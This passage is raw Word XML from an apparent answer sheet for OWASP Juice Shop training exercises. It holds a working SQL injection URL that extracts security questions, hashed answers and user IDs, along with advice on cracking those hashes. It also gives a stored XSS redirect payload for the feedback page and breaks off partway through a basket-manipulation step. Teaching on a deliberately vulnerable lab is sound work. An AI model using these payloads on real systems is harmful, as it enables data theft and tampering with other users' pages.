        <w:t xml:space="preserve">is SQL’s way of querying two tables at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A448AD">
        <w:t>once, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A448AD">
        <w:t xml:space="preserve"> joins two tables together based on a common </w:t>
      </w:r>
      <w:r w:rsidR="0057791C">
        <w:t>element (in this situation, the ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70888DD6" w14:textId="613F4956" w:rsidR="00A73B63" w:rsidRDefault="00A73B63" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">We’ll be looking to extract the question column from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityQuestions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table, and the answer and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> columns from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityAnswers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table. The SQL to do this looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ED5F87" w14:textId="05ECE410" w:rsidR="00A73B63" w:rsidRPr="00677537" w:rsidRDefault="00A73B63" w:rsidP="008F1ACE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q.question</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a.answer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a.UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SecurityQuestions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00544BEF" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> q</w:t>
      </w:r>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> INNER JOIN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SecurityAnswers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00544BEF" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00EE1F26" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ON </w:t>
      </w:r>
      <w:r w:rsidR="00544BEF" w:rsidRPr="00677537">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q.id = a.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5EEC9" w14:textId="2A09C324" w:rsidR="00544BEF" w:rsidRDefault="00544BEF" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">Here we use aliases </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityQuestions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityAnswers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tables respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390020F" w14:textId="7F21A21D" w:rsidR="004E4390" w:rsidRDefault="004E4390" w:rsidP="008F1ACE">
      <w:r>
        <w:t>Now we need to rewrite this query in terms of our UNION SELECT – the final URL looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4855245A" w14:textId="404220B7" w:rsidR="00EB5D96" w:rsidRDefault="00E02904" w:rsidP="008F1ACE">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00EB5D96" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20q.question,%20a.answer,%20a.UserID,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20SecurityQuestions%20q%20INNER%20JOIN%20SecurityAnswers%20a%20ON%20q.id%20=%20a.id--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13C98ED4" w14:textId="2628F5FE" w:rsidR="00F832AA" w:rsidRDefault="00EB5D96" w:rsidP="002F4180">
      <w:r>
        <w:t xml:space="preserve">As it turns out, we got unlucky – the makers of Juice Shop were smart enough to hash their security answers as well as their passwords! It’s unlikely we’ll be able to crack these with a normal </w:t>
      </w:r>
      <w:r w:rsidR="009D2BAA">
        <w:t>password list, but not impossible – give it a go if you like! You can even create a custom wordlist with things you might suspect the users to answer with. Whether you can decrypt the answers or not, this is a good lesson into performing a more complex query!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71E07A" w14:textId="07BD5B93" w:rsidR="00E74113" w:rsidRDefault="00E74113" w:rsidP="002F4180"/>
    <w:p w14:paraId="066ED32C" w14:textId="7F5FC7DB" w:rsidR="00E74113" w:rsidRDefault="00E74113" w:rsidP="002F4180">
      <w:r>
        <w:t>5) Note: For some of the payloads below, a single quotation mark has been rendered</w:t>
      </w:r>
      <w:r w:rsidR="00E86B9D">
        <w:t xml:space="preserve"> in a strange way in Microsoft Word that means copy and pasting the payload directly sometimes causes an error. If it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E86B9D">
        <w:t>doesn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E86B9D">
        <w:t xml:space="preserve"> seem to work, try retyping it!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A999F" w14:textId="4184BFED" w:rsidR="00F832AA" w:rsidRDefault="00F832AA" w:rsidP="00950BE7"/>
    <w:p w14:paraId="1CC3C369" w14:textId="5E87FC5D" w:rsidR="00B30507" w:rsidRDefault="00B30507" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">5.1) </w:t>
      </w:r>
      <w:r w:rsidR="00410CC6">
        <w:t xml:space="preserve">For this exploit to work, the XSS needs to be persistent, and to appear on the administration page – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00410CC6">
        <w:t>both of these</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00410CC6">
        <w:t xml:space="preserve"> things require injection through the Customer Feedback page. Let’s adapt the payload we looked at </w:t>
      </w:r>
      <w:r w:rsidR="00272289">
        <w:t>on the Give it a Go worksheet</w:t>
      </w:r>
      <w:r w:rsidR="005103B9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249F1838" w14:textId="0F72A4F7" w:rsidR="00745935" w:rsidRPr="005F780D" w:rsidRDefault="00745935" w:rsidP="00745935">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt;script&gt;Foo&lt;/script&gt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>’)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1E450" w14:textId="763C5B85" w:rsidR="00745935" w:rsidRDefault="00745935" w:rsidP="00745935">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049006F7" w14:textId="5F81BD62" w:rsidR="00745935" w:rsidRDefault="00745935" w:rsidP="00745935">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rather than sending a harmless alert, we want to perform a redirect using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009A28D0" w:rsidRPr="00776D7F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009A28D0" w:rsidRPr="00776D7F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB40C7" w:rsidRPr="00776D7F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB40C7">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>– let’s use the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4B5429" w14:textId="494B6330" w:rsidR="00AB40C7" w:rsidRPr="005F780D" w:rsidRDefault="0055235E" w:rsidP="0055235E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt;script&gt;Foo&lt;/script&gt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>javascript:window.</w:t>
      </w:r>
      <w:r w:rsidR="009045CA" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009045CA" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004361CB" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="009217E8" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00B835BF" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/#/’</w:t>
      </w:r>
      <w:r w:rsidR="009217E8" w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="005F780D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C28FD8E" w14:textId="173F0F89" w:rsidR="00A3222D" w:rsidRDefault="00A3222D" w:rsidP="0055235E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD2A945" w14:textId="77777777" w:rsidR="000F7D8D" w:rsidRDefault="00A3222D" w:rsidP="000F7D8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003734FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">This redirects users who visit both the ‘About Us’ and </w:t>
      </w:r>
      <w:r w:rsidR="003734FF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>‘Administration’ pages to the homepage!</w:t>
      </w:r>
      <w:r w:rsidR="000F7D8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3DF314" w14:textId="77777777" w:rsidR="000F7D8D" w:rsidRDefault="000F7D8D" w:rsidP="000F7D8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53698136" w14:textId="63FE7679" w:rsidR="0055235E" w:rsidRDefault="0055235E" w:rsidP="000F7D8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="004361CB">
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004361CB">
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="009045CA" w:rsidRPr="004361CB">
        <w:t>’re</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009045CA" w:rsidRPr="004361CB">
        <w:t xml:space="preserve"> using ‘top’ to allow our script to reference the window outside the iframe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3413EC14" w14:textId="77777777" w:rsidR="00776D7F" w:rsidRDefault="00776D7F" w:rsidP="000F7D8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB8766E" w14:textId="01A43082" w:rsidR="00EC3D52" w:rsidRDefault="00EC3D52" w:rsidP="000F7D8D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE679A3" w14:textId="08F02743" w:rsidR="002924DF" w:rsidRDefault="00EC3D52" w:rsidP="00E35378">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>5.2)</w:t>
      </w:r>
      <w:r w:rsidR="006D19F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC56C5">
        <w:t xml:space="preserve">The first step, as always, is to capture the requests necessary for adding an item to basket. It looks like </w:t>
      </w:r>
      <w:r w:rsidR="00EC06A3">
        <w:t xml:space="preserve">it consists of a POST request to </w:t>
      </w:r>
      <w:r w:rsidR="00EC06A3" w:rsidRPr="009831F9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC06A3" w:rsidRPr="009831F9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC06A3" w:rsidRPr="009831F9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC06A3" w:rsidRPr="009831F9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>BasketItems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC06A3">
        <w:t xml:space="preserve">, with data supplied as a JSON that defines </w:t>
      </w:r>
      <w:r w:rsidR="00DB4638">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB4638">
        <w:t>ProductID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB4638">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB4638">
        <w:t>BasketID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB4638">
        <w:t>, and quantity</w:t>
      </w:r>
      <w:r w:rsidR="00E35378">
        <w:t xml:space="preserve"> – for example, </w:t>
      </w:r>
      <w:r w:rsidR="00E35378" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{“ProductId”:</w:t>
      </w:r>
      <w:r w:rsidR="00E56CE1" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E35378" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, “BasketId”:“</w:t>
      </w:r>
      <w:r w:rsidR="00247E7D" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E35378" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”, “quantity”:1}</w:t>
      </w:r>
      <w:r w:rsidR="00E35378" w:rsidRPr="00A461CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E35378">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E35378">
        <w:t>pecifies adding a</w:t>
      </w:r>
